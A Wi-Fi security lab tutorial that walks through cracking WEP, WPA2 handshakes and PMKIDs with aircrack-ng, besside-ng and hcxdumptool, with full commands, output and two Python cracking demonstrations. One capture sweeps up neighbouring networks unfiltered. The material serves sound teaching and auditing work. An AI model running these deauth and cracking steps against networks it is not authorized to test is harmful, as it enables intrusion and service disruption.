Workshop | Wi-Fi Hacking Lab
Johnny Pan
2022-10-08

This lab was created for educational purposes, to practise auditing and improving the security of the following wireless network types:

  • Wired Equivalent Privacy (WEP)
  • Wi-Fi Protected Access (WPA)
  • Wi-Fi Protected Access v2 (WPA2)

Only run it against your own wireless network (or one you are explicitly authorized to test): every step below transmits frames that disrupt or impersonate other people's networks.

Wireless hacking concepts

  • WEP
  • WPA
  • WPA2
  • Monitor Mode (the card captures every 802.11 frame on a channel without associating to any AP)
  • Promiscuous Mode (the card accepts frames addressed to other stations on the network it is associated with)
  • Packet Injection
  • 4-way handshake
  • EAPOL

Requirements

  • Wi-Fi AP/Router
  • Wi-Fi Adapter
  • Aircrack-NG suite
  • Linux OS

Hacking WEP

Changing to root user

[codeskill@wireless ~]$ sudo su

Identifying the wireless adapter

[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Enabling monitor mode

Option #1 - Using ifconfig

With this option the interface keeps its name (wlan0); the rest of the lab uses wlan0mon, the name airmon-ng assigns in option #2. NetworkManager or wpa_supplicant may silently switch the card back to managed mode, which is why airmon-ng check kill is used below.

[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up

Option #2 - Using Airmon-ng

[root@wireless ~]# airmon-ng check wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    494 NetworkManager
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng check kill

Killing these processes:

    PID Name
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
[root@wireless ~]# iwconfig      
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Changing MAC address

The interface must be down while the MAC is changed. After airmon-ng (option #2) the monitor interface is wlan0mon and wlan0 no longer exists; with option #1 substitute wlan0.

[root@wireless ~]# ifconfig wlan0mon down
[root@wireless ~]# macchanger -r wlan0mon
[root@wireless ~]# ifconfig wlan0mon up

Selecting WEP encrypted SSID

[root@wireless ~]# airodump-ng wlan0mon --encrypt wep
CH  6 ][ Elapsed: 48 s ][ 2022-10-09 23:59
 
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 
00:18:39:E4:61:28  -40       26        0    0  11   54e  WEP  WEP    OPENSOURCE

Packet injection

besside-ng automates the WEP attack: it associates with the AP, captures an encrypted ARP frame and replays it so the AP keeps answering, harvesting a fresh IV with every reply (the "FLOOD ... IVs" counter), then runs the aircrack-ng key recovery once enough IVs have been collected. -c is the AP's channel (the CH column of airodump-ng) and -b its BSSID.

[root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28
[00:21:02] Let's ride
[00:21:02] Resuming from besside.log
[00:21:02] Appending to wpa.cap
[00:21:02] Appending to wep.cap
[00:21:02] Logging to besside.log
[00:21:02] | Scanning chan 06
[00:21:02] / Scanning chan 06
[00:21:02] / Attacking [OPENSOURCE] WEP - PING
[00:21:02] - Attacking [OPENSOURCE] WEP - PING
...
[00:21:03] Associated to OPENSOURCE AID [1]
[00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY
...
[00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
...
[00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
...
[00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64
[00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64
[00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64
[00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs
[00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec
[00:42:56] TO-OWN [] OWNED [OPENSOURCE]
[00:42:56] All neighbors owned

Cracking wep.cap file

besside-ng already printed the key, but the IVs saved in wep.cap can be cracked again offline with aircrack-ng. The byte(vote) table is the PTW statistical ranking of candidates for each key byte; the recovered 40-bit key BF:53:9E:DB:37 is the same as above.

[root@wireless ~]# aircrack-ng ./wep.cap

Aircrack-ng 1.7 

                                                                       [00:00:01] Tested 67097 keys (got 45009 IVs)

   KB    depth   byte(vote)
    0    0/  1   BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920) 
    1    0/ 35   53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432) 
    2    0/  3   9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688) 
    3    0/  3   DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944) 
    4  206/214   AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472) 

                         KEY FOUND! [ BF:53:9E:DB:37 ] 
        Decrypted correctly: 100%
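The attack above works because WEP seeds RC4 with a 24-bit IV prepended to the static key, so keystreams repeat and every captured IV leaks information about the key; that is why besside-ng floods the AP for IVs. The following Python is an added example, not part of the workshop or of the aircrack-ng suite: it implements WEP encryption, shows that an attacker who can guess one frame's plaintext (the fixed LLC/SNAP header of an ARP frame) recovers the keystream for that IV without the key, and then reads another frame sent under the same IV. The key is the one recovered above; IVs, frames and payloads are constructed. The PTW statistics aircrack-ng uses to recover the key itself are not reproduced.

```python
import struct
import zlib
from typing import Dict, Optional, Tuple

# The 40-bit key is the one the workshop recovered (bf:53:9e:db:37); everything
# else in this example (IV, frame contents) is constructed for the demonstration.
WEP_KEY = bytes.fromhex("bf539edb37")
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # fixed 8-byte header of every ARP frame
IP_FRAME = bytes.fromhex("aaaa0300000008004500003c") + b"secret payload"  # a later frame (constructed)


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || key, so the IV is the only thing that varies."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: 3-byte IV in clear, then RC4(IV||key) XOR (payload || CRC32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    ks = rc4_keystream(iv + key, len(payload) + 4)
    return iv + bytes(p ^ k for p, k in zip(payload + icv, ks))


def wep_decrypt(key: bytes, body: bytes) -> Tuple[bytes, bool]:
    """Legitimate receiver: returns (payload, icv_ok)."""
    iv, ct = body[:3], body[3:]
    pt = bytes(c ^ k for c, k in zip(ct, rc4_keystream(iv + key, len(ct))))
    payload, icv = pt[:-4], pt[-4:]
    return payload, icv == struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def keystream_from_known_plaintext(body: bytes, known: bytes) -> Tuple[bytes, bytes]:
    """Attacker side, no key needed: ciphertext XOR known plaintext yields the keystream
    bytes for this IV, as many bytes as plaintext we can guess."""
    iv, ct = body[:3], body[3:]
    return iv, bytes(c ^ p for c, p in zip(ct, known))


def decrypt_prefix_with_table(body: bytes, table: Dict[bytes, bytes]) -> Optional[bytes]:
    """Read the start of any frame whose IV already has a recovered keystream."""
    iv, ct = body[:3], body[3:]
    ks = table.get(iv)
    if ks is None:
        return None
    return bytes(c ^ k for c, k in zip(ct, ks))


def demo() -> Optional[bytes]:
    iv = bytes.fromhex("0a1b2c")
    arp = LLC_SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01" + bytes(20)  # ARP request (constructed)
    frame_a = wep_encrypt(WEP_KEY, iv, arp)
    frame_b = wep_encrypt(WEP_KEY, iv, IP_FRAME)       # IV reused: same keystream as frame_a
    # The attacker recognises frame_a as ARP (size and timing give it away) and learns
    # 16 keystream bytes for IV 0a1b2c without ever touching the key...
    iv_seen, ks = keystream_from_known_plaintext(frame_a, arp[:16])
    table = {iv_seen: ks}
    # ...which decrypts the first 16 bytes of any other frame sent under that IV.
    return decrypt_prefix_with_table(frame_b, table)


if __name__ == "__main__":
    print(demo())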


Hacking WPA/WPA2

Prepare the adapter exactly as in the WEP section: switch to root, identify the adapter with iwconfig, put it in monitor mode (airmon-ng check kill, then airmon-ng start wlan0) and optionally randomize its MAC. The rest of this section assumes wlan0mon is up in monitor mode.

Selecting WPA/WPA2 encrypted SSID

[root@wireless ~]# airodump-ng wlan0mon
 CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03                                 
 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                             
 00:18:39:E4:61:28  -50       41        6    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE 
 BE:A7:B9:14:DB:98  -57       40        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
 BA:A7:B9:14:DB:98  -54       41        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
 B6:A7:B9:14:DB:98  -57       42        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
 B0:A7:B9:14:DB:98  -57       39        0    0   6  130   WPA2 CCMP   PSK  YOSHI                                                                                                    
 62:AF:97:C2:4E:24  -33       37        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
 5E:AF:97:C2:4E:24  -33       40        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
 5A:AF:97:C2:4E:24  -34       41        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
 54:AF:97:C2:4E:24  -33       42        0    0   6  130   WPA2 CCMP   PSK  YOSHI
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                                          
 00:18:39:E4:61:28  16:41:DA:4E:36:EA  -31    0 - 1e     0       23           

Monitor the network for a handshake

Press Ctrl+C and review the list of SSIDs. Pick the one you are authorized to audit; here we work with OPENSOURCE (BSSID 00:18:39:E4:61:28 on channel 6).

A handshake occurs when a client (station) connects to the AP, for example when your laptop joins the router. For WPA/WPA2-PSK this is the 4-way handshake carried in EAPOL-Key frames; the MIC in its second message is computed with a key derived from the passphrase, which is what the offline dictionary attack checks. You must capture it before you can attack the password. To start monitoring, run:

airodump-ng --channel <CHANNEL> --bssid <MAC-AP> -w <CAPTURE-FILE> wlan0mon

In our case the values are the following:

CHANNEL = 6
MAC-AP = 00:18:39:E4:61:28
CAPTURE-FILE = wpa2

As long as this command stays running, you'll be monitoring for all connections and new handshakes.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

CH  6 ][ Elapsed: 0 s ][ 2022-10-10 23:25
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

00:18:39:E4:61:28  -51 100       43        1    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes 

Deauth attack

A deauth attack sends spoofed deauthentication frames to the client on behalf of the AP (they are unauthenticated management frames unless the network uses 802.11w), causing the client to disconnect and reconnect. The reconnection runs a new 4-way handshake, which airodump-ng records. Without a deauth you may wait a long time for a client to connect on its own, and you need that handshake to attack the password.

If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step because you have what you need to crack the password and don't need to send deauth packets.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

00:18:39:E4:61:28  -48 100      690       31    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes 
    

Wait for a client to connect. Once the lower table shows a row with the router under BSSID and a device under STATION (here 16:41:DA:4E:36:EA), a client is associated; the Notes column reads EAPOL once handshake frames from it have been seen. To force a fresh handshake, send that client deauth frames.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ]                       

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43    1e- 1e   177      129  EAPOL  OPENSOURCE

Open a new terminal. Make sure airodump-ng is still running in original terminal window, and drag it to another place on your desktop so both terminals are visible.

Send the deauth frames. Run the following, with -a set to the router's BSSID and -c to the MAC of the connected client: aireplay-ng -0 2 -a <AP BSSID> -c <STATION MAC> wlan0mon.

-0 2 sends two deauth bursts (aireplay-ng emits 64 frames per burst, as the output shows). Don't send many more than that: flooding the client with deauths can keep it from reconnecting, and without the reconnection there is no handshake.

As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client.
As soon as the client reconnects, all of the information you'll need to crack the password will be available.

[root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon   
23:47:41  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:47:41  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs]
23:47:42  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs]   

Cracking wpa2.cap file

When the airodump-ng header shows WPA handshake: <AP MAC ADDRESS>, you can start cracking the password.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -49 100     3257       26    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes  

In the original terminal window, press Ctrl+C to quit airodump-ng. The capture is written to the current directory as wpa2-01.cap (the -w prefix plus a sequence number).

Decompress the rockyou.txt wordlist. To crack the password you need a wordlist; on Kali the wordlists package ships several in /usr/share/wordlists. The one used here is rockyou.txt, which is gzipped by default. You won't recover the passphrase if it's not in the wordlist; try another list if rockyou.txt fails.

apt install wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz

Run aircrack-ng, which ships with Kali, against the capture: aircrack-ng -a2 -b <NETWORK BSSID> -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap, replacing <NETWORK BSSID> with the router's BSSID. -a2 selects the WPA-PSK attack and -b restricts it to the handshake of that AP.

Depending on the wordlist size and your CPU speed this can take anywhere from minutes to days; for each candidate aircrack-ng runs 4096 rounds of PBKDF2 and recomputes the handshake MIC. If you are cracking a static WEP key instead of a WPA/WPA2-PSK network, use -a1 instead of -a2.

[root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap

Aircrack-ng 1.7 

      [00:00:00] 2171/10303727 keys tested (5462.94 k/s) 

      Time left: 31 minutes, 25 seconds                          0.02%

                           KEY FOUND! [ qwerty123 ]


      Master Key     : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16 
                       92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A
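What aircrack-ng did between "keys tested" and "KEY FOUND", as an added Python example (not code from the workshop or from aircrack-ng): for each candidate it derives the PMK (the Master Key above) with PBKDF2-HMAC-SHA1 over the ESSID, expands it with PRF-512 to the PTK, and recomputes the MIC of handshake message 2 with the first 16 bytes of the PTK (the KCK); a match means the passphrase is right. The handshake below is constructed so the script runs offline: the ESSID, AP and station MACs are the lab's, while the nonces, replay counter and RSN IE are assumptions. The IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE") checks the PMK derivation against a published value.

```python
import hashlib
import hmac
import struct
from typing import List, Optional

MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields up to the Key MIC field


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32); aircrack-ng prints it as 'Master Key'."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 with label 'Pairwise key expansion' (HMAC-SHA1); PTK[0:16] is the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC field zeroed,
    truncated to 16 bytes. aircrack-ng prints this as 'EAPOL HMAC'."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(snonce: bytes, replay_counter: int, key_data: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP): RSN descriptor, key info = MIC|Pairwise|KDV2."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter)
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # key IV, RSC, key ID, MIC placeholder
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 = EAPOL-Key


def crack_handshake(essid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    m2: bytes, wordlist: List[str]) -> Optional[str]:
    """The per-candidate work of aircrack-ng -a2: PMK -> PTK -> KCK -> MIC, then compare."""
    captured = m2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # not a legal WPA-PSK passphrase (hashcat counts these as 'Rejected')
            continue
        kck = derive_ptk(derive_pmk(cand, essid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2), captured):
            return cand
    return None


# Constructed capture (assumption): the lab ESSID and MACs, fixed nonces, a typical RSN IE.
ESSID = "OPENSOURCE"
AP_MAC = bytes.fromhex("001839e46128")
STA_MAC = bytes.fromhex("1641da4e36ea")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def make_capture(passphrase: str) -> bytes:
    """Plays the client: builds M2 and fills in the real MIC for the given passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    m2 = build_m2(SNONCE, 1, RSN_IE)
    return m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]


if __name__ == "__main__":
    m2 = make_capture("qwerty123")
    print("PMK for qwerty123 / OPENSOURCE:", derive_pmk("qwerty123", ESSID).hex())
    print("recovered:", crack_handshake(ESSID, AP_MAC, STA_MAC, ANONCE, SNONCE, m2,
                                        ["123456", "password", "letmein1", "qwerty123"]))
```

Only message 2 (or 3) of the handshake is needed for the check, and the nonces and MACs must come from the same exchange, which is why aircrack-ng and hcxpcapngtool are picky about "pairs" and replay counters.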

Hacking PMKID

Installing the needed tools

[root@wireless ~]# apt install hcxdumptool
[root@wireless ~]# apt install hcxtools

Capturing PMKID packets

The PMKID depends only on the PMK and the two MAC addresses: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC). Many APs include it in the first message (M1) of the 4-way handshake, which they send to any client that associates, so hcxdumptool's rogue client (CLIENT (ROGUE) in the banner below) can collect it without a real client being present and without a deauth. Note that hcxdumptool attacks every AP in range by default; use its filter list to restrict it to your own BSSID (FILTERLIST ACCESS POINT and FILTERMODE are "0 entries" and "unused" below).

[root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls

start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy3
INTERFACE NAME............: wlan0
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack)
DRIVER....................: mt76x2u
DRIVER VERSION............: 5.18.0-kali7-amd64
DRIVER FIRMWARE VERSION...: 0.0.00-b1
openSSL version...........: 1.0
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: d85dfb0ab897
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63589
ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7

TIME     FREQ/CH  MAC_DEST     MAC_SOURCE   ESSID [FRAME TYPE]
01:11:31 2442/7   6872c30f193c 54af97c24e24 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2]
01:11:47 2462/11  6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2]
01:13:50 2412/1   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2]
01:13:54 2417/2   94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2]
01:13:56 2422/3   6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2]
01:14:00 2427/4   6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2]
01:14:08 2437/6   94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2]
01:14:17 2447/8   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2]
01:16:17 5805/161 a86daa1620a1 54af97c24e25 SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2]
01:16:19 5805/161 1c4d660367fb 6aaf97c24e25 ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2]

Converting the capture to hashcat 22000 format

hcxpcapngtool extracts both the PMKIDs and the usable EAPOL handshake pairs into one 22000 hash file (6 PMKIDs and 17 handshakes below); -E, -I and -U additionally dump the ESSIDs, EAP identities and usernames it saw to text files, which are useful as wordlist seeds.

[root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng 
hcxpcapngtool 6.2.7 reading from test.pcapng...

summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-kali7-amd64
application..............................: hcxdumptool 6.2.6
interface name...........................: wlan0
interface vendor.........................: 00c0ca
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client)
MAC CLIENT...............................: d85dfb0ab897
REPLAYCOUNT..............................: 63589
ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
timestamp minimum (GMT)..................: 14.10.2022 01:11:07
timestamp maximum (GMT)..................: 14.10.2022 01:23:11
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)...............: little endian
packets inside...........................: 3780
packets received on 2.4 GHz..............: 1637
packets received on 5 GHz................: 1754
ESSID (total unique).....................: 67
BEACON (total)...........................: 79
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11 
BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161 
BEACON (SSID wildcard/unset).............: 4
BEACON (SSID zeroed).....................: 2
ACTION (total)...........................: 33
ACTION (containing ESSID)................: 31
PROBEREQUEST.............................: 17
PROBEREQUEST (directed)..................: 2
PROBERESPONSE (total)....................: 59
AUTHENTICATION (total)...................: 75
AUTHENTICATION (OPEN SYSTEM).............: 75
ASSOCIATIONREQUEST (total)...............: 19
ASSOCIATIONREQUEST (PSK).................: 17
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 3435
EAPOL RSN messages.......................: 3435
EAPOLTIME gap (measured maximum usec)....: 1479862
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (suggested NC)...........: 2
EAPOL M1 messages (total)................: 2581
EAPOL M2 messages (total)................: 810
EAPOL M3 messages (total)................: 22
EAPOL M4 messages (total)................: 22
EAPOL pairs (total)......................: 8526
EAPOL pairs (best).......................: 17
EAPOL ROGUE pairs........................: 11
EAPOL pairs written to 22000 hash file...: 17 (RC checked)
EAPOL M12E2 (challenge)..................: 12
EAPOL M32E2 (authorized).................: 5
PMKID (useless)..........................: 40
PMKID (total)............................: 160
PMKID (best).............................: 6
PMKID ROGUE..............................: 5
PMKID written to 22000 hash file.........: 6
malformed packets (total)................: 3
BEACON error (total malformed packets)...: 3

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2412: 275       2417: 180       2422: 55        2427: 181
 2432: 92        2437: 100       2442: 11        2447: 92
